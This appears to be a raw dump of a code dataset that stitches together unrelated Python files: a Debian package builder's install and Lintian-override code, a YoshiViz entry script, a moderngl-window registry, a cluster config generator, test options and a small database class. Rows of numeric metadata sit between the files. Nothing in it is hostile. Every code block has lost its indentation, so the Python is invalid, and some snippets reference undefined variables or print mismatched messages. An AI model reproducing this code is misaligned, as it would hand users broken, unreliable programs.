# Uses the system's package installer:
# gdebi if available or dpkg
#
# Shows a success dialog if installed. Otherwise shows an
# error dialog.
# \param package
# \b \e unicode|str : Path to package to be installed
def InstallPackage(self, package):
system_installer = GetSystemInstaller()
if not system_installer:
ShowErrorDialog(
GT(u'Cannot install package'),
GT(u'A compatible package manager could not be found on the system'),
__name__,
warn=True
)
return
Logger.Info(__name__, GT(u'Attempting to install package: {}').format(package))
Logger.Info(__name__, GT(u'Installing with {}').format(system_installer))
install_cmd = (system_installer, package,)
wx.Yield()
# FIXME: Use ExecuteCommand here
install_output = subprocess.Popen(install_cmd)
# Command appears to not have been executed correctly
if install_output == None:
ShowErrorDialog(
GT(u'Could not install package: {}'),
GT(u'An unknown error occurred'),
__name__
)
return
# Command executed but did not return success code
if install_output.returncode:
err_details = (
GT(u'Process returned code {}').format(install_output.returncode),
GT(u'Command executed: {}').format(u' '.join(install_cmd)),
)
ShowErrorDialog(
GT(u'An error occurred during installation'),
u'\n'.join(err_details),
__name__
)
return
## TODO: Doxygen
def OnBuild(self, event=None):
# Build preparation
ret_code, build_prep = self.BuildPrep()
if ret_code == dbrerrno.ECNCLD:
return
if ret_code == dbrerrno.FEMPTY:
err_dia = DetailedMessageDialog(GetMainWindow(), GT(u'Cannot Continue'), ICON_EXCLAMATION,
text=u'{}\n{}'.format(GT(u'One of the required fields is empty:'), build_prep))
err_dia.ShowModal()
err_dia.Destroy()
return
if ret_code == dbrerrno.SUCCESS:
task_list, build_path, filename = build_prep
# Actual build
ret_code, result = self.Build(task_list, build_path, filename)
# FIXME: Check .deb package timestamp to confirm build success
if ret_code == dbrerrno.SUCCESS:
DetailedMessageDialog(GetMainWindow(), GT(u'Success'), ICON_INFORMATION,
text=GT(u'Package created successfully')).ShowModal()
# Installing the package
if FieldEnabled(self.chk_install) and self.chk_install.GetValue():
self.InstallPackage(result)
return
if result:
ShowErrorDialog(GT(u'Package build failed'), result)
else:
ShowErrorDialog(GT(u'Package build failed with unknown error'))
return
if build_prep:
ShowErrorDialog(GT(u'Build preparation failed'), build_prep)
else:
ShowErrorDialog(GT(u'Build preparation failed with unknown error'))
## TODO: Doxygen
#
# TODO: Show warning dialog that this could take a while
# TODO: Add cancel option to progress dialog
# FIXME: List should be cached so no need for re-scanning
def OnSetLintOverrides(self, event=None):
Logger.Debug(__name__, GT(u'Setting Lintian overrides...'))
lintian_tags_file = u'{}/data/lintian/tags'.format(PATH_app)
if not os.path.isfile(lintian_tags_file):
Logger.Error(__name__, u'Lintian tags file is missing: {}'.format(lintian_tags_file))
return False
lint_tags = RemoveEmptyLines(ReadFile(lintian_tags_file, split=True))
if lint_tags:
Logger.Debug(__name__, u'Lintian tags set')
# DEBUG: Start
if DebugEnabled() and len(lint_tags) > 50:
print(u' Reducing tag count to 200 ...')
lint_tags = lint_tags[:50]
Logger.Debug(__name__, u'Processing {} tags'.format(len(lint_tags)))
# DEBUG: End
tag_count = len(lint_tags)
def GetProgressMessage(message, count=tag_count):
return u'{} ({} {})'.format(message, count, GT(u'tags'))
progress = TimedProgressDialog(GetMainWindow(), GT(u'Building Tag List'),
GetProgressMessage(GT(u'Scanning default tags')))
progress.Start()
wx.Yield()
# Create the dialog
overrides_dialog = CheckListDialog(GetMainWindow(), title=GT(u'Lintian Overrides'),
allow_custom=True)
# FIXME: Needs progress dialog
overrides_dialog.InitCheckList(tuple(lint_tags))
progress.SetMessage(GetProgressMessage(GT(u'Setting selected overrides')))
for T in lint_tags:
if T in self.lint_overrides:
overrides_dialog.SetItemCheckedByLabel(T)
self.lint_overrides.remove(T)
progress.SetMessage(GetProgressMessage(GT(u'Adding custom tags'), len(self.lint_overrides)))
# Remaining tags should be custom entries
# FIXME:
if self.lint_overrides:
for T in self.lint_overrides:
overrides_dialog.AddItem(T, True)
progress.Stop()
if overrides_dialog.ShowModal() == wx.ID_OK:
# Remove old overrides
self.lint_overrides = []
for L in overrides_dialog.GetCheckedLabels():
Logger.Debug(__name__, GT(u'Adding Lintian override: {}').format(L))
self.lint_overrides.append(L)
return True
else:
Logger.Debug(__name__, u'Setting lintian tags failed')
return False
## TODO: Doxygen
#
# TODO: Use string names in project file but retain
# compatibility with older projects that use
# integer values.
def Set(self, data):
# ???: Redundant
self.Reset()
build_data = data.split(u'\n')
if GetExecutable(u'md5sum'):
try:
self.chk_md5.SetValue(int(build_data[0]))
except IndexError:
pass
try:
self.chk_rmstage.SetValue(int(build_data[1]))
except IndexError:
pass
if GetExecutable(u'lintian'):
try:
self.chk_lint.SetValue(int(build_data[2]))
except IndexError:
pass
self.chk_strip.SetValue(GetExecutable(u'strip') and u'strip' in build_data)
## TODO: Doxygen
def SetSummary(self, event=None):
pg_scripts = GetPage(pgid.SCRIPTS)
# Make sure the page is not destroyed so no error is thrown
if self:
# Set summary when "Build" page is shown
# Get the file count
files_total = GetPage(pgid.FILES).GetFileCount()
f = GT(u'File Count')
file_count = u'{}: {}'.format(f, files_total)
# Scripts to make
scripts_to_make = []
scripts = ((u'preinst', pg_scripts.chk_preinst),
(u'postinst', pg_scripts.chk_postinst),
(u'prerm', pg_scripts.chk_prerm),
(u'postrm', pg_scripts.chk_postrm))
for script in scripts:
if script[1].IsChecked():
scripts_to_make.append(script[0])
s = GT(u'Scripts')
if len(scripts_to_make):
scripts_to_make = u'{}: {}'.format(s, u', '.join(scripts_to_make))
else:
scripts_to_make = u'{}: 0'.format(s)
self.summary.SetValue(u'\n'.join((file_count, scripts_to_make)))
| 28.251451 | 151 | 0.691736 | 3,995 | 29,212 | 4.900626 | 0.161202 | 0.00996 | 0.00899 | 0.022219 | 0.236541 | 0.17489 | 0.12749 | 0.103637 | 0.088467 | 0.073858 | 0.000068 | 0.006506 | 0.189682 | 29,212 | 1,033 | 152 | 28.2788 | 0.820244 | 0.162844 | 0 | 0.239482 | 0 | 0 | 0.11004 | 0.003253 | 0 | 0 | 0 | 0.000968 | 0 | 0 | null | null | 0.004854 | 0.071197 | null | null | 0.004854 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6c8ce8afe1fef7a0e2e19b44facdada82817d59 | 311 | py | Python | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 6 | 2017-05-07T09:39:18.000Z | 2021-10-07T01:46:08.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 1 | 2018-01-15T15:31:03.000Z | 2018-01-15T15:31:03.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 5 | 2020-02-28T04:16:16.000Z | 2021-04-30T09:35:19.000Z | from YoshiViz import Gui
if __name__ == '__main__':
#file director
gui = Gui.Gui()
"""
report_generator.\
generate_pdf_report(fileDirectory, repositoryName, tempCommunityType)
"""
print('the type of', repositoryName, 'is', tempCommunityType, '\n"check .\YoshiViz\output"')
| 25.916667 | 96 | 0.662379 | 31 | 311 | 6.290323 | 0.774194 | 0.061538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209003 | 311 | 11 | 97 | 28.272727 | 0.792683 | 0.041801 | 0 | 0 | 1 | 0 | 0.265193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6cd191f4e7eeaa1d075d528c9e2ada0827d674f | 4,618 | py | Python | HW2/dbsys-hw2/Database.py | yliu120/dbsystem | d1b008f411929058a34a1dd2c44c9ee2cf899865 | [
"Apache-2.0"
] | null | null | null | HW2/dbsys-hw2/Database.py | yliu120/dbsystem | d1b008f411929058a34a1dd2c44c9ee2cf899865 | [
"Apache-2.0"
] | null | null | null | HW2/dbsys-hw2/Database.py | yliu120/dbsystem | d1b008f411929058a34a1dd2c44c9ee2cf899865 | [
"Apache-2.0"
] | null | null | null | import json, io, os, os.path
from Catalog.Schema import DBSchema, DBSchemaEncoder, DBSchemaDecoder
from Query.Plan import PlanBuilder
from Storage.StorageEngine import StorageEngine
class Database:
"""
A top-level database engine class.
For now, this primarily maintains a simple catalog,
mapping relation names to schema objects.
Also, it provides the ability to construct query
plan objects, as well as wrapping the storage layer methods.
"""
checkpointEncoding = "latin1"
checkpointFile = "db.catalog"
def __init__(self, **kwargs):
other = kwargs.get("other", None)
if other:
self.fromOther(other)
else:
storageArgs = {k:v for (k,v) in kwargs.items() \
if k in ["pageSize", "poolSize", "dataDir", "indexDir"]}
self.relationMap = kwargs.get("relations", {})
self.defaultPageSize = kwargs.get("pageSize", io.DEFAULT_BUFFER_SIZE)
self.storage = kwargs.get("storage", StorageEngine(**storageArgs))
checkpointFound = os.path.exists(os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile))
restoring = "restore" in kwargs
if not restoring and checkpointFound:
self.restore()
def fromOther(self, other):
self.relationMap = other.relationMap
self.defaultPageSize = other.defaultPageSize
self.storage = other.storage
def close(self):
if self.storage:
self.storage.close()
# Database internal components
def storageEngine(self):
return self.storage
def bufferPool(self):
return self.storage.bufferPool if self.storage else None
def fileManager(self):
return self.storage.fileMgr if self.storage else None
# User API
# Catalog methods
def relations(self):
return self.relationMap.keys()
def hasRelation(self, relationName):
return relationName in self.relationMap
def relationSchema(self, relationName):
if relationName in self.relationMap:
return self.relationMap[relationName]
# DDL statements
def createRelation(self, relationName, relationFields):
if relationName not in self.relationMap:
schema = DBSchema(relationName, relationFields)
self.relationMap[relationName] = schema
self.storage.createRelation(relationName, schema)
self.checkpoint()
else:
raise ValueError("Relation '" + relationName + "' already exists")
def removeRelation(self, relationName):
if relationName in self.relationMap:
del self.relationMap[relationName]
self.storage.removeRelation(relationName)
self.checkpoint()
else:
raise ValueError("No relation '" + relationName + "' found in database")
# DML statements
# Returns a tuple id for the newly inserted data.
def insertTuple(self, relationName, tupleData):
if relationName in self.relationMap:
return self.storage.insertTuple(relationName, tupleData)
else:
raise ValueError("Unknown relation '" + relationName + "' while inserting a tuple")
def deleteTuple(self, tupleId):
self.storage.deleteTuple(tupleId)
def updateTuple(self, tupleId, tupleData):
self.storage.updateTuple(tupleId, tupleData)
# Queries
# Returns an empty query builder that can access the current database.
def query(self):
return PlanBuilder(db=self)
# Returns an iterable for query results, after initializing the given plan.
def processQuery(self, queryPlan):
return queryPlan.prepare(self)
# Save the database internals to the data directory.
def checkpoint(self):
if self.storage:
dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile)
with open(dbcPath, 'w', encoding=Database.checkpointEncoding) as f:
f.write(self.pack())
# Load relations and schema from an existing data directory.
def restore(self):
if self.storage:
dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile)
with open(dbcPath, 'r', encoding=Database.checkpointEncoding) as f:
other = Database.unpack(f.read(), self.storage)
self.fromOther(other)
# Database schema catalog serialization
def pack(self):
if self.relationMap is not None:
return json.dumps([self.relationMap, self.defaultPageSize], cls=DBSchemaEncoder)
@classmethod
def unpack(cls, buffer, storageEngine):
(relationMap, pageSize) = json.loads(buffer, cls=DBSchemaDecoder)
return cls(relations=relationMap, pageSize=pageSize, storage=storageEngine, restore=True)
if __name__ == "__main__":
import doctest
doctest.testmod()
| 31.848276 | 107 | 0.707016 | 524 | 4,618 | 6.204198 | 0.311069 | 0.067671 | 0.019994 | 0.035681 | 0.177176 | 0.121193 | 0.121193 | 0.076592 | 0.076592 | 0.059059 | 0 | 0.000271 | 0.19987 | 4,618 | 144 | 108 | 32.069444 | 0.879567 | 0.145518 | 0 | 0.177778 | 0 | 0 | 0.049578 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.055556 | 0.077778 | 0.433333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6ce056f0a84e4b655921e3c42a24774c81e07e4 | 619 | py | Python | moderngl_window/resources/data.py | DavideRuzza/moderngl-window | e9debc6ed4a1899aa83c0da2320e03b0c2922b80 | [
"MIT"
] | 142 | 2019-11-11T23:14:28.000Z | 2022-03-29T08:37:03.000Z | moderngl_window/resources/data.py | DavideRuzza/moderngl-window | e9debc6ed4a1899aa83c0da2320e03b0c2922b80 | [
"MIT"
] | 107 | 2019-10-31T20:31:45.000Z | 2022-03-23T15:01:41.000Z | moderngl_window/resources/data.py | DavideRuzza/moderngl-window | e9debc6ed4a1899aa83c0da2320e03b0c2922b80 | [
"MIT"
] | 36 | 2019-12-12T16:14:10.000Z | 2022-01-18T22:58:21.000Z | """
Registry general data files
"""
from typing import Any
from moderngl_window.resources.base import BaseRegistry
from moderngl_window.meta import DataDescription
class DataFiles(BaseRegistry):
"""Registry for requested data files"""
settings_attr = "DATA_LOADERS"
def load(self, meta: DataDescription) -> Any:
"""Load data file with the configured loaders.
Args:
meta (:py:class:`~moderngl_window.meta.data.DataDescription`): the resource description
Returns:
Any: The loaded resource
"""
return super().load(meta)
data = DataFiles()
| 23.807692 | 99 | 0.678514 | 69 | 619 | 6.014493 | 0.536232 | 0.101205 | 0.086747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227787 | 619 | 25 | 100 | 24.76 | 0.868201 | 0.390953 | 0 | 0 | 0 | 0 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e6cebeadc3ade385a017e0f9c9ce037d2f450345 | 2,106 | py | Python | quarkchain/tools/config_slave.py | HAOYUatHZ/pyquarkchain | b2c7c02e4415aa26917c2cbb5e7571c9fef16c5b | [
"MIT"
] | 1 | 2018-10-23T05:48:42.000Z | 2018-10-23T05:48:42.000Z | quarkchain/tools/config_slave.py | skji/pyquarkchain | 090f9981b89b8873daaed36171a9bc9f27b10473 | [
"MIT"
] | 3 | 2020-03-12T18:09:40.000Z | 2021-02-26T02:33:09.000Z | quarkchain/tools/config_slave.py | skji/pyquarkchain | 090f9981b89b8873daaed36171a9bc9f27b10473 | [
"MIT"
] | null | null | null | """
python config_slave.py 127.0.0.1 38000 38006 127.0.0.2 18999 18002
will generate 4 slave server configs accordingly. will be used in deployment automation to configure a cluster.
usage: python config_slave.py <host1> <port1> <port2> <host2> <port3> ...
"""
import argparse
import collections
import json
import os
FILE = "../../testnet/2/cluster_config_template.json"
if "QKC_CONFIG" in os.environ:
FILE = os.environ["QKC_CONFIG"]
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"hostports",
nargs="+",
metavar="hostports",
help="Host and ports for slave config",
)
args = parser.parse_args()
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
###############
# parse hosts and ports to form a slave list
###############
host_port_mapping = collections.defaultdict(list)
last_host = None
for host_or_port in args.hostports: # type: str
if not host_or_port.isdigit(): # host
last_host = host_or_port
else: # port
host_port_mapping[last_host].append(host_or_port)
assert None not in host_port_mapping
slave_num = sum(len(port_list) for port_list in host_port_mapping.values())
# make sure number of slaves is power of 2
assert slave_num > 0 and (slave_num & (slave_num - 1) == 0)
slave_servers, i = [], 0
for host, port_list in host_port_mapping.items():
for port in port_list:
s = {
"HOST": host,
"PORT": int(port),
"ID": "S%d" % i,
"CHAIN_MASK_LIST": [i | slave_num],
}
slave_servers.append(s)
i += 1
###############
# read config file and substitute with updated slave config
###############
with open(FILE, "r+") as f:
parsed_config = json.load(f)
parsed_config["SLAVE_LIST"] = slave_servers
f.seek(0)
f.truncate()
f.write(json.dumps(parsed_config, indent=4))
if __name__ == "__main__":
main()
| 28.459459 | 111 | 0.597816 | 279 | 2,106 | 4.301075 | 0.419355 | 0.046667 | 0.0625 | 0.0425 | 0.041667 | 0.041667 | 0 | 0 | 0 | 0 | 0 | 0.030579 | 0.27018 | 2,106 | 73 | 112 | 28.849315 | 0.750163 | 0.197531 | 0 | 0 | 1 | 0 | 0.100434 | 0.027278 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.020833 | false | 0 | 0.083333 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6d6837b46baf712793275d6754e0dab0bf209be | 602 | py | Python | baseline/ns-vqa/reason/options/test_options.py | robinzixuan/Video-Question-Answering-HRI | ae68ffee1e6fc1eb13229e457e3b8e3bc3a11579 | [
"MIT"
] | 52 | 2019-12-04T22:26:56.000Z | 2022-03-31T17:04:15.000Z | reason/options/test_options.py | guxiwuruo/VCML | 5a0f01a0baba238cef2f63131fccd412e3d7822b | [
"MIT"
] | 6 | 2020-08-25T07:35:14.000Z | 2021-09-09T04:57:09.000Z | reason/options/test_options.py | guxiwuruo/VCML | 5a0f01a0baba238cef2f63131fccd412e3d7822b | [
"MIT"
] | 5 | 2020-02-10T07:39:24.000Z | 2021-06-23T02:53:42.000Z | from .base_options import BaseOptions
class TestOptions(BaseOptions):
"""Test Option Class"""
def __init__(self):
super(TestOptions, self).__init__()
self.parser.add_argument('--load_checkpoint_path', required=True, type=str, help='checkpoint path')
self.parser.add_argument('--save_result_path', required=True, type=str, help='save result path')
self.parser.add_argument('--max_val_samples', default=None, type=int, help='max val data')
self.parser.add_argument('--batch_size', default=256, type=int, help='batch_size')
self.is_train = False | 43 | 107 | 0.699336 | 79 | 602 | 5.050633 | 0.493671 | 0.100251 | 0.130326 | 0.210526 | 0.260652 | 0.135338 | 0 | 0 | 0 | 0 | 0 | 0.005929 | 0.159468 | 602 | 14 | 108 | 43 | 0.782609 | 0.028239 | 0 | 0 | 0 | 0 | 0.210345 | 0.037931 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.